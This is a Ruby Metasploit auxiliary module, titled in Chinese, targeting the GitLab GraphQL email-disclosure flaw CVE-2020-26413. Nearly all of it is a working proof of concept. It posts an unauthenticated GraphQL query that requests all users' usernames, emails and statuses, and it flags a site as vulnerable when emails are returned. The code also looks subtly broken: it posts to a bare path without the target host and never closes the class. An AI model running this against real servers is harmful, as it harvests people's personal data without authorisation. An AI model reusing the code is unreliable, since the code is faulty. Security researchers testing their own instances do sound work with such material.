# GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413

require "open-uri"  
require 'net/https'
require 'json'

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'CVE_2020_26413_PoC',
        'Description'    => 'This module is used to scan the target site for CVE_2020_26413.',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    
    def run_host(ip)
  
      uri = datastore['TARGETURI'] + '/api/graphql'  
      params={}
      params['query']="{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }"
      params["variables"] = nil
      params["operationName"] = nil


      begin
        res = Net::HTTP.post(uri, params.to_json,"Content-Type"=> "application/json", "User-Agent"=> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36") 
    
        if res.body["email"] and res.body["username"] and res.body["@"]
            print_warning("The CVE_2020_26413 vulnerability exists at the target site!")
        else
            print_good("The CVE_2020_26413 vulnerability was not detected at the target site.")
        end
    
      rescue => ex
        if ex.message['404']
          print_good('The CVE_2020_26413 vulnerability was not detected at the target site.')
        else
          print_error('Some errors occurred...')
          print_error(ex.message)
        end
      end
  end